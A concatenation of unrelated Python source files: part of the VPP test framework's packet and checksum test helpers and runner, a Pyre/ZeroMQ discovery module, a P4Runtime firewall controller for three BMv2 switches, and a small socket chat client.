dst_idx = dst_if.sw_if_index
if dst_idx in cls._packet_count_for_dst_if_idx:
cls._packet_count_for_dst_if_idx[dst_idx] += 1
else:
cls._packet_count_for_dst_if_idx[dst_idx] = 1
cls._packet_infos[info.index] = info
return info
@staticmethod
def info_to_payload(info):
"""
Convert _PacketInfo object to packet payload
:param info: _PacketInfo object
:returns: string containing serialized data from packet info
"""
return "%d %d %d %d %d" % (info.index, info.src, info.dst,
info.ip, info.proto)
@staticmethod
def payload_to_info(payload, payload_field='load'):
"""
Convert packet payload to _PacketInfo object
:param payload: packet payload
:type payload: <class 'scapy.packet.Raw'>
:param payload_field: packet fieldname of payload "load" for
<class 'scapy.packet.Raw'>
:type payload_field: str
:returns: _PacketInfo object containing de-serialized data from payload
"""
numbers = getattr(payload, payload_field).split()
info = _PacketInfo()
info.index = int(numbers[0])
info.src = int(numbers[1])
info.dst = int(numbers[2])
info.ip = int(numbers[3])
info.proto = int(numbers[4])
return info
def get_next_packet_info(self, info):
"""
Iterate over the packet info list stored in the testcase
Start iteration with first element if info is None
Continue based on index in info if info is specified
:param info: info or None
:returns: next info in list or None if no more infos
"""
if info is None:
next_index = 0
else:
next_index = info.index + 1
if next_index == len(self._packet_infos):
return None
else:
return self._packet_infos[next_index]
def get_next_packet_info_for_interface(self, src_index, info):
"""
Search the packet info list for the next packet info with same source
interface index
:param src_index: source interface index to search for
:param info: packet info - where to start the search
:returns: packet info or None
"""
while True:
info = self.get_next_packet_info(info)
if info is None:
return None
if info.src == src_index:
return info
def get_next_packet_info_for_interface2(self, src_index, dst_index, info):
"""
Search the packet info list for the next packet info with same source
and destination interface indexes
:param src_index: source interface index to search for
:param dst_index: destination interface index to search for
:param info: packet info - where to start the search
:returns: packet info or None
"""
while True:
info = self.get_next_packet_info_for_interface(src_index, info)
if info is None:
return None
if info.dst == dst_index:
return info
def assert_equal(self, real_value, expected_value, name_or_class=None):
if name_or_class is None:
self.assertEqual(real_value, expected_value)
return
try:
msg = "Invalid %s: %d('%s') does not match expected value %d('%s')"
msg = msg % (getdoc(name_or_class).strip(),
real_value, str(name_or_class(real_value)),
expected_value, str(name_or_class(expected_value)))
except Exception:
msg = "Invalid %s: %s does not match expected value %s" % (
name_or_class, real_value, expected_value)
self.assertEqual(real_value, expected_value, msg)
def assert_in_range(self,
real_value,
expected_min,
expected_max,
name=None):
if name is None:
msg = None
else:
msg = "Invalid %s: %s out of range <%s,%s>" % (
name, real_value, expected_min, expected_max)
self.assertTrue(expected_min <= real_value <= expected_max, msg)
def assert_packet_checksums_valid(self, packet,
ignore_zero_udp_checksums=True):
received = packet.__class__(scapy.compat.raw(packet))
udp_layers = ['UDP', 'UDPerror']
checksum_fields = ['cksum', 'chksum']
checksums = []
counter = 0
temp = received.__class__(scapy.compat.raw(received))
while True:
layer = temp.getlayer(counter)
if layer:
layer = layer.copy()
layer.remove_payload()
for cf in checksum_fields:
if hasattr(layer, cf):
if ignore_zero_udp_checksums and \
0 == getattr(layer, cf) and \
layer.name in udp_layers:
continue
delattr(temp.getlayer(counter), cf)
checksums.append((counter, cf))
else:
break
counter = counter + 1
if 0 == len(checksums):
return
temp = temp.__class__(scapy.compat.raw(temp))
for layer, cf in checksums:
calc_sum = getattr(temp[layer], cf)
self.assert_equal(
getattr(received[layer], cf), calc_sum,
"packet checksum on layer #%d: %s" % (layer, temp[layer].name))
self.logger.debug(
"Checksum field `%s` on `%s` layer has correct value `%s`" %
(cf, temp[layer].name, calc_sum))
def assert_checksum_valid(self, received_packet, layer,
field_name='chksum',
ignore_zero_checksum=False):
""" Check checksum of received packet on given layer """
received_packet_checksum = getattr(received_packet[layer], field_name)
if ignore_zero_checksum and 0 == received_packet_checksum:
return
recalculated = received_packet.__class__(
scapy.compat.raw(received_packet))
delattr(recalculated[layer], field_name)
recalculated = recalculated.__class__(scapy.compat.raw(recalculated))
self.assert_equal(received_packet_checksum,
getattr(recalculated[layer], field_name),
"packet checksum on layer: %s" % layer)
def assert_ip_checksum_valid(self, received_packet,
ignore_zero_checksum=False):
self.assert_checksum_valid(received_packet, 'IP',
ignore_zero_checksum=ignore_zero_checksum)
def assert_tcp_checksum_valid(self, received_packet,
ignore_zero_checksum=False):
self.assert_checksum_valid(received_packet, 'TCP',
ignore_zero_checksum=ignore_zero_checksum)
def assert_udp_checksum_valid(self, received_packet,
ignore_zero_checksum=True):
self.assert_checksum_valid(received_packet, 'UDP',
ignore_zero_checksum=ignore_zero_checksum)
def assert_embedded_icmp_checksum_valid(self, received_packet):
if received_packet.haslayer(IPerror):
self.assert_checksum_valid(received_packet, 'IPerror')
if received_packet.haslayer(TCPerror):
self.assert_checksum_valid(received_packet, 'TCPerror')
if received_packet.haslayer(UDPerror):
self.assert_checksum_valid(received_packet, 'UDPerror',
ignore_zero_checksum=True)
if received_packet.haslayer(ICMPerror):
self.assert_checksum_valid(received_packet, 'ICMPerror')
def assert_icmp_checksum_valid(self, received_packet):
self.assert_checksum_valid(received_packet, 'ICMP')
self.assert_embedded_icmp_checksum_valid(received_packet)
def assert_icmpv6_checksum_valid(self, pkt):
if pkt.haslayer(ICMPv6DestUnreach):
self.assert_checksum_valid(pkt, 'ICMPv6DestUnreach', 'cksum')
self.assert_embedded_icmp_checksum_valid(pkt)
if pkt.haslayer(ICMPv6EchoRequest):
self.assert_checksum_valid(pkt, 'ICMPv6EchoRequest', 'cksum')
if pkt.haslayer(ICMPv6EchoReply):
self.assert_checksum_valid(pkt, 'ICMPv6EchoReply', 'cksum')
def get_packet_counter(self, counter):
if counter.startswith("/"):
counter_value = self.statistics.get_counter(counter)
else:
counters = self.vapi.cli("sh errors").split('\n')
counter_value = 0
for i in range(1, len(counters) - 1):
results = counters[i].split()
if results[1] == counter:
counter_value = int(results[0])
break
return counter_value
def assert_packet_counter_equal(self, counter, expected_value):
counter_value = self.get_packet_counter(counter)
self.assert_equal(counter_value, expected_value,
"packet counter `%s'" % counter)
def assert_error_counter_equal(self, counter, expected_value):
counter_value = self.statistics.get_err_counter(counter)
self.assert_equal(counter_value, expected_value,
"error counter `%s'" % counter)
@classmethod
def sleep(cls, timeout, remark=None):
# /* Allow sleep(0) to maintain win32 semantics, and as decreed
# * by Guido, only the main thread can be interrupted.
# */
# https://github.com/python/cpython/blob/6673decfa0fb078f60587f5cb5e98460eea137c2/Modules/timemodule.c#L1892 # noqa
if timeout == 0:
# yield quantum
if hasattr(os, 'sched_yield'):
os.sched_yield()
else:
time.sleep(0)
return
cls.logger.debug("Starting sleep for %es (%s)", timeout, remark)
before = time.time()
time.sleep(timeout)
after = time.time()
if after - before > 2 * timeout:
cls.logger.error("unexpected self.sleep() result - "
"slept for %es instead of ~%es!",
after - before, timeout)
cls.logger.debug(
"Finished sleep (%s) - slept %es (wanted %es)",
remark, after - before, timeout)
def pg_send(self, intf, pkts, worker=None):
self.vapi.cli("clear trace")
intf.add_stream(pkts, worker=worker)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
def send_and_assert_no_replies(self, intf, pkts, remark="", timeout=None):
self.pg_send(intf, pkts)
if not timeout:
timeout = 1
for i in self.pg_interfaces:
i.get_capture(0, timeout=timeout)
i.assert_nothing_captured(remark=remark)
timeout = 0.1
def send_and_expect(self, intf, pkts, output, n_rx=None, worker=None):
if not n_rx:
n_rx = len(pkts)
self.pg_send(intf, pkts, worker=worker)
rx = output.get_capture(n_rx)
return rx
def send_and_expect_only(self, intf, pkts, output, timeout=None):
self.pg_send(intf, pkts)
rx = output.get_capture(len(pkts))
outputs = [output]
if not timeout:
timeout = 1
for i in self.pg_interfaces:
if i not in outputs:
i.get_capture(0, timeout=timeout)
i.assert_nothing_captured()
timeout = 0.1
return rx
def get_testcase_doc_name(test):
return getdoc(test.__class__).splitlines()[0]
def get_test_description(descriptions, test):
short_description = test.shortDescription()
if descriptions and short_description:
return short_description
else:
return str(test)
class TestCaseInfo(object):
def __init__(self, logger, tempdir, vpp_pid, vpp_bin_path):
self.logger = logger
self.tempdir = tempdir
self.vpp_pid = vpp_pid
self.vpp_bin_path = vpp_bin_path
self.core_crash_test = None
class VppTestResult(unittest.TestResult):
"""
@property result_string
String variable to store the test case result string.
@property errors
List variable containing 2-tuples of TestCase instances and strings
holding formatted tracebacks. Each tuple represents a test which
raised an unexpected exception.
@property failures
List variable containing 2-tuples of TestCase instances and strings
holding formatted tracebacks. Each tuple represents a test where
a failure was explicitly signalled using the TestCase.assert*()
methods.
"""
failed_test_cases_info = set()
core_crash_test_cases_info = set()
current_test_case_info = None
def __init__(self, stream=None, descriptions=None, verbosity=None,
runner=None):
"""
:param stream File descriptor to store where to report test results.
Set to the standard error stream by default.
:param descriptions Boolean variable to store information if to use
test case descriptions.
:param verbosity Integer variable to store required verbosity level.
"""
super(VppTestResult, self).__init__(stream, descriptions, verbosity)
self.stream = stream
self.descriptions = descriptions
self.verbosity = verbosity
self.result_string = None
self.runner = runner
def addSuccess(self, test):
"""
Record a test succeeded result
:param test:
"""
if self.current_test_case_info:
self.current_test_case_info.logger.debug(
"--- addSuccess() %s.%s(%s) called" % (test.__class__.__name__,
test._testMethodName,
test._testMethodDoc))
unittest.TestResult.addSuccess(self, test)
self.result_string = colorize("OK", GREEN)
self.send_result_through_pipe(test, PASS)
def addSkip(self, test, reason):
"""
Record a test skipped.
:param test:
:param reason:
"""
if self.current_test_case_info:
self.current_test_case_info.logger.debug(
"--- addSkip() %s.%s(%s) called, reason is %s" %
(test.__class__.__name__, test._testMethodName,
test._testMethodDoc, reason))
unittest.TestResult.addSkip(self, test, reason)
self.result_string = colorize("SKIP", YELLOW)
self.send_result_through_pipe(test, SKIP)
def symlink_failed(self):
if self.current_test_case_info:
try:
failed_dir = os.getenv('FAILED_DIR')
link_path = os.path.join(
failed_dir,
'%s-FAILED' %
os.path.basename(self.current_test_case_info.tempdir))
self.current_test_case_info.logger.debug(
"creating a link to the failed test")
self.current_test_case_info.logger.debug(
"os.symlink(%s, %s)" %
(self.current_test_case_info.tempdir, link_path))
if os.path.exists(link_path):
self.current_test_case_info.logger.debug(
'symlink already exists')
else:
os.symlink(self.current_test_case_info.tempdir, link_path)
except Exception as e:
self.current_test_case_info.logger.error(e)
def send_result_through_pipe(self, test, result):
if hasattr(self, 'test_framework_result_pipe'):
pipe = self.test_framework_result_pipe
if pipe:
pipe.send((test.id(), result))
def log_error(self, test, err, fn_name):
if self.current_test_case_info:
if isinstance(test, unittest.suite._ErrorHolder):
test_name = test.description
else:
test_name = '%s.%s(%s)' % (test.__class__.__name__,
test._testMethodName,
test._testMethodDoc)
self.current_test_case_info.logger.debug(
"--- %s() %s called, err is %s" %
(fn_name, test_name, err))
self.current_test_case_info.logger.debug(
"formatted exception is:\n%s" %
"".join(format_exception(*err)))
def add_error(self, test, err, unittest_fn, error_type):
if error_type == FAIL:
self.log_error(test, err, 'addFailure')
error_type_str = colorize("FAIL", RED)
elif error_type == ERROR:
self.log_error(test, err, 'addError')
error_type_str = colorize("ERROR", RED)
else:
raise Exception('Error type %s cannot be used to record an '
'error or a failure' % error_type)
unittest_fn(self, test, err)
if self.current_test_case_info:
self.result_string = "%s [ temp dir used by test case: %s ]" % \
(error_type_str,
self.current_test_case_info.tempdir)
self.symlink_failed()
self.failed_test_cases_info.add(self.current_test_case_info)
if is_core_present(self.current_test_case_info.tempdir):
if not self.current_test_case_info.core_crash_test:
if isinstance(test, unittest.suite._ErrorHolder):
test_name = str(test)
else:
test_name = "'{!s}' ({!s})".format(
get_testcase_doc_name(test), test.id())
self.current_test_case_info.core_crash_test = test_name
self.core_crash_test_cases_info.add(
self.current_test_case_info)
else:
self.result_string = '%s [no temp dir]' % error_type_str
self.send_result_through_pipe(test, error_type)
def addFailure(self, test, err):
"""
Record a test failed result
:param test:
:param err: error message
"""
self.add_error(test, err, unittest.TestResult.addFailure, FAIL)
def addError(self, test, err):
"""
Record a test error result
:param test:
:param err: error message
"""
self.add_error(test, err, unittest.TestResult.addError, ERROR)
def getDescription(self, test):
"""
Get test description
:param test:
:returns: test description
"""
return get_test_description(self.descriptions, test)
def startTest(self, test):
"""
Start a test
:param test:
"""
def print_header(test):
test_doc = getdoc(test)
if not test_doc:
raise Exception("No doc string for test '%s'" % test.id())
test_title = test_doc.splitlines()[0]
test_title_colored = colorize(test_title, GREEN)
if test.force_solo():
# long live PEP-8 and 80 char width limitation...
c = YELLOW
test_title_colored = colorize("SOLO RUN: " + test_title, c)
if not hasattr(test.__class__, '_header_printed'):
print(double_line_delim)
print(test_title_colored)
print(double_line_delim)
test.__class__._header_printed = True
print_header(test)
self.start_test = time.time()
unittest.TestResult.startTest(self, test)
if self.verbosity > 0:
self.stream.writeln(
"Starting " + self.getDescription(test) + " ...")
self.stream.writeln(single_line_delim)
def stopTest(self, test):
"""
Called when the given test has been run
:param test:
"""
unittest.TestResult.stopTest(self, test)
if self.verbosity > 0:
self.stream.writeln(single_line_delim)
self.stream.writeln("%-73s%s" % (self.getDescription(test),
self.result_string))
self.stream.writeln(single_line_delim)
else:
self.stream.writeln("%-68s %4.2f %s" %
(self.getDescription(test),
time.time() - self.start_test,
self.result_string))
self.send_result_through_pipe(test, TEST_RUN)
def printErrors(self):
"""
Print errors from running the test case
"""
if len(self.errors) > 0 or len(self.failures) > 0:
self.stream.writeln()
self.printErrorList('ERROR', self.errors)
self.printErrorList('FAIL', self.failures)
# ^^ that is the last output from unittest before summary
if not self.runner.print_summary:
devnull = unittest.runner._WritelnDecorator(open(os.devnull, 'w'))
self.stream = devnull
self.runner.stream = devnull
def printErrorList(self, flavour, errors):
"""
Print error list to the output stream together with error type
and test case description.
:param flavour: error type
:param errors: iterable errors
"""
for test, err in errors:
self.stream.writeln(double_line_delim)
self.stream.writeln("%s: %s" %
(flavour, self.getDescription(test)))
self.stream.writeln(single_line_delim)
self.stream.writeln("%s" % err)
class VppTestRunner(unittest.TextTestRunner):
"""
A basic test runner implementation which prints results to standard error.
"""
@property
def resultclass(self):
"""Class maintaining the results of the tests"""
return VppTestResult
def __init__(self, keep_alive_pipe=None, descriptions=True, verbosity=1,
result_pipe=None, failfast=False, buffer=False,
resultclass=None, print_summary=True, **kwargs):
# ignore stream setting here, use hard-coded stdout to be in sync
# with prints from VppTestCase methods ...
super(VppTestRunner, self).__init__(sys.stdout, descriptions,
verbosity, failfast, buffer,
resultclass, **kwargs)
KeepAliveReporter.pipe = keep_alive_pipe
self.orig_stream = self.stream
self.resultclass.test_framework_result_pipe = result_pipe
self.print_summary = print_summary
def _makeResult(self):
return self.resultclass(self.stream,
self.descriptions,
self.verbosity,
self)
def run(self, test):
"""
Run the tests
:param test:
"""
faulthandler.enable() # emit stack trace to stderr if killed by signal
result = super(VppTestRunner, self).run(test)
if not self.print_summary:
self.stream = self.orig_stream
result.stream = self.orig_stream
return result
class Worker(Thread):
def __init__(self, executable_args, logger, env=None, *args, **kwargs):
super(Worker, self).__init__(*args, **kwargs)
self.logger = logger
self.args = executable_args
if hasattr(self, 'testcase') and self.testcase.debug_all:
if self.testcase.debug_gdbserver:
self.args = ['/usr/bin/gdbserver', 'localhost:{port}'
.format(port=self.testcase.gdbserver_port)] + args
elif self.testcase.debug_gdb and hasattr(self, 'wait_for_gdb'):
self.args.append(self.wait_for_gdb)
self.app_bin = executable_args[0]
self.app_name = os.path.basename(self.app_bin)
if hasattr(self, 'role'):
self.app_name += ' {role}'.format(role=self.role)
self.process = None
self.result = None
env = {} if env is None else env
self.env = copy.deepcopy(env)
def wait_for_enter(self):
if not hasattr(self, 'testcase'):
return
if self.testcase.debug_all and self.testcase.debug_gdbserver:
print()
print(double_line_delim)
print("Spawned GDB Server for '{app}' with PID: {pid}"
.format(app=self.app_name, pid=self.process.pid))
elif self.testcase.debug_all and self.testcase.debug_gdb:
print()
print(double_line_delim)
print("Spawned '{app}' with PID: {pid}"
.format(app=self.app_name, pid=self.process.pid))
else:
return
print(single_line_delim)
print("You can debug '{app}' using:".format(app=self.app_name))
if self.testcase.debug_gdbserver:
print("sudo gdb " + self.app_bin +
" -ex 'target remote localhost:{port}'"
.format(port=self.testcase.gdbserver_port))
print("Now is the time to attach gdb by running the above "
"command, set up breakpoints etc., then resume from "
"within gdb by issuing the 'continue' command")
self.testcase.gdbserver_port += 1
elif self.testcase.debug_gdb:
print("sudo gdb " + self.app_bin +
" -ex 'attach {pid}'".format(pid=self.process.pid))
print("Now is the time to attach gdb by running the above "
"command and set up breakpoints etc., then resume from"
" within gdb by issuing the 'continue' command")
print(single_line_delim)
input("Press ENTER to continue running the testcase...")
def run(self):
executable = self.args[0]
if not os.path.exists(executable) or not os.access(
executable, os.F_OK | os.X_OK):
# Exit code that means some system file did not exist,
# could not be opened, or had some other kind of error.
self.result = os.EX_OSFILE
raise EnvironmentError(
"executable '%s' is not found or executable." % executable)
self.logger.debug("Running executable: '{app}'"
.format(app=' '.join(self.args)))
env = os.environ.copy()
env.update(self.env)
env["CK_LOG_FILE_NAME"] = "-"
self.process = subprocess.Popen(
self.args, shell=False, env=env, preexec_fn=os.setpgrp,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.wait_for_enter()
out, err = self.process.communicate()
self.logger.debug("Finished running `{app}'".format(app=self.app_name))
self.logger.info("Return code is `%s'" % self.process.returncode)
self.logger.info(single_line_delim)
self.logger.info("Executable `{app}' wrote to stdout:"
.format(app=self.app_name))
self.logger.info(single_line_delim)
self.logger.info(out.decode('utf-8'))
self.logger.info(single_line_delim)
self.logger.info("Executable `{app}' wrote to stderr:"
.format(app=self.app_name))
self.logger.info(single_line_delim)
self.logger.info(err.decode('utf-8'))
self.logger.info(single_line_delim)
self.result = self.process.returncode
if __name__ == '__main__':
pass
|
pyre_discovery_master_module.py
|
from pyre import Pyre
from pyre import zhelper
import threading
import zmq
import logging
import json
import time
from uniflex.core import modules
__author__ = "Piotr Gawlowicz"
__copyright__ = "Copyright (c) 2015, Technische Universitat Berlin"
__version__ = "0.1.0"
__email__ = "{gawlowicz}@tkn.tu-berlin.de"
class PyreDiscoveryMasterModule(modules.ControlApplication):
def __init__(self, iface, groupName="uniflex", downlink=None, sub=None,
uplink=None, pub=None):
super(PyreDiscoveryMasterModule, self).__init__()
self.log = logging.getLogger('pyre_discovery_module.main')
pyreLogger = logging.getLogger('pyre')
pyreLogger.setLevel(logging.CRITICAL)
self.running = False
self.iface = iface
self.sub = downlink
if not self.sub:
self.sub = sub
self.pub = uplink
if not self.pub:
self.pub = pub
self.groupName = groupName
self.ctx = zmq.Context()
def _sending_announcements(self):
while self.running:
self.log.debug("Discovery Announcements:"
" SUB={}, PUB={}"
.format(self.sub, self.pub))
msg = json.dumps({'downlink': self.sub,
'uplink': self.pub})
self.discovery_pipe.send(msg.encode('utf_8'))
time.sleep(2)
@modules.on_start()
def start_discovery_announcements(self):
self.log.debug("Start discovery announcements".format())
self.running = True
self.discovery_pipe = zhelper.zthread_fork(
self.ctx, self.discovery_task)
d = threading.Thread(target=self._sending_announcements)
d.setDaemon(True)
d.start()
return True
@modules.on_exit()
def stop_discovery_announcements(self):
self.log.debug("Stop discovery announcements".format())
if self.running:
self.running = False
self.discovery_pipe.send("$$STOP".encode('utf_8'))
def discovery_task(self, ctx, pipe):
self.log.debug("Pyre on iface : {}".format(self.iface))
n = Pyre(self.groupName, sel_iface=self.iface)
n.set_header("DISCOVERY_Header1", "DISCOVERY_HEADER")
n.join(self.groupName)
n.start()
poller = zmq.Poller()
poller.register(pipe, zmq.POLLIN)
while(True):
items = dict(poller.poll())
if pipe in items and items[pipe] == zmq.POLLIN:
message = pipe.recv()
# message to quit
if message.decode('utf-8') == "$$STOP":
break
n.shout(self.groupName, message)
n.stop()
|
controller.py
|
#!/usr/bin/env python2
import argparse
import grpc
import time
import os
import sys
import json
import pickle
from time import sleep
from collections import defaultdict
import threading
# Import P4Runtime lib from parent utils dir
# Probably there's a better way of doing this.
sys.path.append(
os.path.join(os.path.dirname(os.path.abspath(__file__)),
'../../utils/'))
import p4runtime_lib.bmv2
from p4runtime_lib.error_utils import printGrpcError
from p4runtime_lib.switch import ShutdownAllSwitchConnections
import p4runtime_lib.helper
def prettify_ip(s):
return ':'.join([str(ord(b)) for b in s])
def readTableRules(p4info_helper, sw):
"""
Reads the table entries from all tables on the switch.
:param p4info_helper: the P4Info helper
:param sw: the switch connection
"""
print '\n----- Reading tables rules for %s -----' % sw.name
for response in sw.ReadTableEntries():
for entity in response.entities:
entry = entity.table_entry
table_name = p4info_helper.get_tables_name(entry.table_id)
print '%s: ' % table_name,
for m in entry.match:
print p4info_helper.get_match_field_name(
table_name, m.field_id),
print '%r' % (p4info_helper.get_match_field_value(m),),
action = entry.action.action
action_name = p4info_helper.get_actions_name(action.action_id)
print '->', action_name,
for p in action.params:
print p4info_helper.get_action_param_name(
action_name, p.param_id),
print '%r' % p.value,
print
def writeDropEntry(p4info_helper, sw, table_name):
drop_entry = p4info_helper.buildTableEntry(
table_name= "MyIngress." + table_name,
default_action = True,
action_name = "MyIngress.drop",
action_params = {}
)
sw.WriteTableEntry(drop_entry)
return drop_entry
def writeTableEntry(p4info_helper, sw, table_name, dst_eth_addr, dst_eth_port, dst_ip_addr):
table_entry = p4info_helper.buildTableEntry(
table_name = "MyIngress." + table_name,
match_fields = {
"hdr.ipv4.dstAddr": [dst_ip_addr, 32]
},
action_name = "MyIngress.ipv4_forward",
action_params = {
"dstAddr": dst_eth_addr,
"port": dst_eth_port
}
)
sw.WriteTableEntry(table_entry)
return table_entry
def printDigests(p4info_helper, sw, idx, lock, ready):
lock.acquire()
print "Start checking digests for %s" % sw.device_id
ready[idx] = True
lock.release()
# TODO this is hardcoded
DIGEST_ID = 385924487
digest_entry = p4info_helper.BuildDigestEntry(digest_id=DIGEST_ID)
sw.SendDigestEntry(digest_entry)
while True:
print
for msgs in sw.StreamDigestMessages(digest_id=DIGEST_ID):
for members in msgs.data:
if members.WhichOneof('data') == 'struct':
srcAddr, dstAddr = None, None
if members.struct.members[0].WhichOneof('data') == 'bitstring':
srcAddr = prettify_ip(members.struct.members[0].bitstring)
if members.struct.members[1].WhichOneof('data') == 'bitstring':
dstAddr = prettify_ip(members.struct.members[1].bitstring)
if srcAddr and dstAddr:
print "Packet dropped from %s to %s" % (srcAddr, dstAddr)
time.sleep(100)
print "Finished checking digests for %s" % sw.device_id
def main(p4info_file_path, bmv2_file_path):
# Instantiate a P4Runtime helper from the p4info file
p4info_helper = p4runtime_lib.helper.P4InfoHelper(p4info_file_path)
try:
# Create a switch connection object for s1 and s2;
# this is backed by a P4Runtime gRPC connection.
# Also, dump all P4Runtime messages sent to switch to given txt files.
s1 = p4runtime_lib.bmv2.Bmv2SwitchConnection(
name='s1',
address='127.0.0.1:50051',
device_id=0,
proto_dump_file='logs/s1-p4runtime-requests.txt')
s2 = p4runtime_lib.bmv2.Bmv2SwitchConnection(
name='s2',
address='127.0.0.1:50052',
device_id=1,
proto_dump_file='logs/s2-p4runtime-requests.txt')
s3 = p4runtime_lib.bmv2.Bmv2SwitchConnection(
name='s3',
address='127.0.0.1:50053',
device_id=2,
proto_dump_file='logs/s3-p4runtime-requests.txt'
)
switches = {
0: s1,
1: s2,
2: s3
}
# Send master arbitration update message to establish this controller as
# master (required by P4Runtime before performing any other write operation)
s1.MasterArbitrationUpdate()
s2.MasterArbitrationUpdate()
s3.MasterArbitrationUpdate()
# Install the P4 program on the switches
s1.SetForwardingPipelineConfig(p4info=p4info_helper.p4info,
bmv2_json_file_path=bmv2_file_path)
print "Installed P4 Program using SetForwardingPipelineConfig on s1"
s2.SetForwardingPipelineConfig(p4info=p4info_helper.p4info,
bmv2_json_file_path=bmv2_file_path)
print "Installed P4 Program using SetForwardingPipelineConfig on s2"
s3.SetForwardingPipelineConfig(p4info=p4info_helper.p4info,
bmv2_json_file_path=bmv2_file_path)
print "Installed P4 Program using SetForwardingPipelineConfig on s3"
# deal with table entries
TABLE_NAME = "ipv4_lpm"
# from_sw:{ to_sw: [rules] }
accept_rules = defaultdict(dict)
# start print digest in separate threads
ready = [ False for _ in switches.items() ]
lock = threading.Lock()
for idx, (_, sw) in enumerate(switches.items()):
t = threading.Thread(target=printDigests, args=(p4info_helper, sw, idx, lock, ready))
t.start()
while True:
lock.acquire()
result = True
for state in ready:
result = result and state
if result:
lock.release()
break
else:
lock.release()
while True:
rule = raw_input("# Please enter a command: ")
rules = rule.split(" ")
rule = rules[0]
if rule == 'drop':
if len(rules) > 1:
from_sw_id, to_sw_id = int(rules[1]), int(rules[2])
if to_sw_id not in accept_rules[from_sw_id]:
print "There's no allowed traffic from switch %s to %s" % (from_sw_id, to_sw_id)
else:
switches[from_sw_id].DeleteTableEntry(accept_rules[from_sw_id][to_sw_id])
accept_rules[from_sw_id].pop(to_sw_id, None)
print "Connection from %s to %s dropped" % (from_sw_id, to_sw_id)
else:
# write all drop table rules
writeDropEntry(p4info_helper, s1, TABLE_NAME)
writeDropEntry(p4info_helper, s2, TABLE_NAME)
writeDropEntry(p4info_helper, s3, TABLE_NAME)
print "Installed drop rules on s1, s2, s3"
elif rule == 'accept':
if s1.device_id not in accept_rules[s1.device_id]:
r = writeTableEntry(p4info_helper, s1, TABLE_NAME,
"00:00:00:00:01:01", 1, "10.0.1.1")
accept_rules[s1.device_id][s1.device_id] = r
else:
print "Already allow traffic from switch %s to %s" % (s1.device_id, s1.device_id)
if s2.device_id not in accept_rules[s1.device_id]:
r = writeTableEntry(p4info_helper, s1, TABLE_NAME,
"00:00:00:02:02:00", 2, "10.0.2.2")
accept_rules[s1.device_id][s2.device_id] = r
else:
print "Already allow traffic from switch %s to %s" % (
s1.device_id, s2.device_id)
if s3.device_id not in accept_rules[s1.device_id]:
r = writeTableEntry(p4info_helper, s1, TABLE_NAME,
"00:00:00:03:03:00", 3, "10.0.3.3")
accept_rules[s1.device_id][s3.device_id] = r
else:
print "Already allow traffic from switch %s to %s" % (
s1.device_id, s3.device_id)
print "Installed transit rules for s1"
if s1.device_id not in accept_rules[s2.device_id]:
r = writeTableEntry(p4info_helper, s2, TABLE_NAME,
"00:00:00:01:01:00", 2, "10.0.1.1")
accept_rules[s2.device_id][s1.device_id] = r
else:
print "Already allow traffic from switch %s to %s" % (
s2.device_id, s1.device_id)
if s2.device_id not in accept_rules[s2.device_id]:
r = writeTableEntry(p4info_helper, s2, TABLE_NAME,
"00:00:00:00:02:02", 1, "10.0.2.2")
accept_rules[s2.device_id][s2.device_id] = r
else:
print "Already allow traffic from switch %s to %s" % (
s2.device_id, s2.device_id)
if s3.device_id not in accept_rules[s2.device_id]:
r = writeTableEntry(p4info_helper, s2, TABLE_NAME,
"00:00:00:03:03:00", 3, "10.0.3.3")
accept_rules[s2.device_id][s3.device_id] = r
else:
print "Already allow traffic from switch %s to %s" % (
s2.device_id, s3.device_id)
print "Installed transit rules for s2"
if s1.device_id not in accept_rules[s3.device_id]:
r = writeTableEntry(p4info_helper, s3, TABLE_NAME,
"00:00:00:01:01:00", 2, "10.0.1.1")
accept_rules[s3.device_id][s1.device_id] = r
else:
print "Already allow traffic from switch %s to %s" % (
s3.device_id, s1.device_id)
if s2.device_id not in accept_rules[s3.device_id]:
r = writeTableEntry(p4info_helper, s3, TABLE_NAME,
"00:00:00:02:02:00", 3, "10.0.2.2")
accept_rules[s3.device_id][s2.device_id] = r
else:
print "Already allow traffic from switch %s to %s" % (
s3.device_id, s2.device_id)
if s3.device_id not in accept_rules[s3.device_id]:
r = writeTableEntry(p4info_helper, s3, TABLE_NAME,
"00:00:00:00:03:03", 1, "10.0.3.3")
accept_rules[s3.device_id][s3.device_id] = r
else:
print "Already allow traffic from switch %s to %s" % (
s3.device_id, s3.device_id)
print "Installed transit rules for s3"
# read table rules
readTableRules(p4info_helper, s1)
readTableRules(p4info_helper, s2)
readTableRules(p4info_helper, s3)
except grpc.RpcError as e:
printGrpcError(e)
except KeyboardInterrupt:
print " Shutting down."
ShutdownAllSwitchConnections()
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='P4Runtime Controller')
parser.add_argument('--p4info', help='p4info proto in text format from p4c',
type=str, action="store", required=False,
default='./build/firewall.p4.p4info.txt')
parser.add_argument('--bmv2-json', help='BMv2 JSON file from p4c',
type=str, action="store", required=False,
default='./build/firewall.json')
args = parser.parse_args()
if not os.path.exists(args.p4info):
parser.print_help()
print "\np4info file not found: %s\nHave you run 'make'?" % args.p4info
parser.exit(1)
if not os.path.exists(args.bmv2_json):
parser.print_help()
print "\nBMv2 JSON file not found: %s\nHave you run 'make'?" % args.bmv2_json
parser.exit(1)
main(args.p4info, args.bmv2_json)
|
clientV4.py
|
import socket
import threading
helpMessage = '-q -- close connection\n-l -- list of connected devices\n-t -- server time \n-s "arduino/client ""reciever name" "message" -- send message (messages can be max 100 character) \nif reciever is an arduino board it can be controlled by this messsage:\n -s arduino "arduino name" led "0/1/status" \n'
print("connecting...\n for command list write '-h' \n"+helpMessage)
host = '127.0.0.1' # 127.0.0.1 for local
port = 9999 # 9999 for local
socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
socket.connect((host, port))
def recvTh():
while True:
try:
message = socket.recv(100).decode('ascii')
if message == 't':
socket.send("c".encode('ascii'))
elif message == 'n':
name = input("Enter your client name: ")
socket.send(name.encode('ascii'))
else:
print(message+"\n")
except ConnectionAbortedError:
break
except:
print("connection error")
socket.close()
break
def sendTh():
while True:
message = input()
if (len(message)<= 1024):
tokens = message.split()
if tokens[0] == '-h':
print(helpMessage)
elif tokens[0] == '-q':
print("quiting")
socket.send('-q'.encode('ascii'))
socket.close()
break
else:
socket.send(message.encode('ascii'))
else:
print("message must be under 1024 char")
recvThread = threading.Thread(target=recvTh)
sendThread = threading.Thread(target=sendTh)
recvThread.start()
sendThread.start()
|
sara_data.py
|
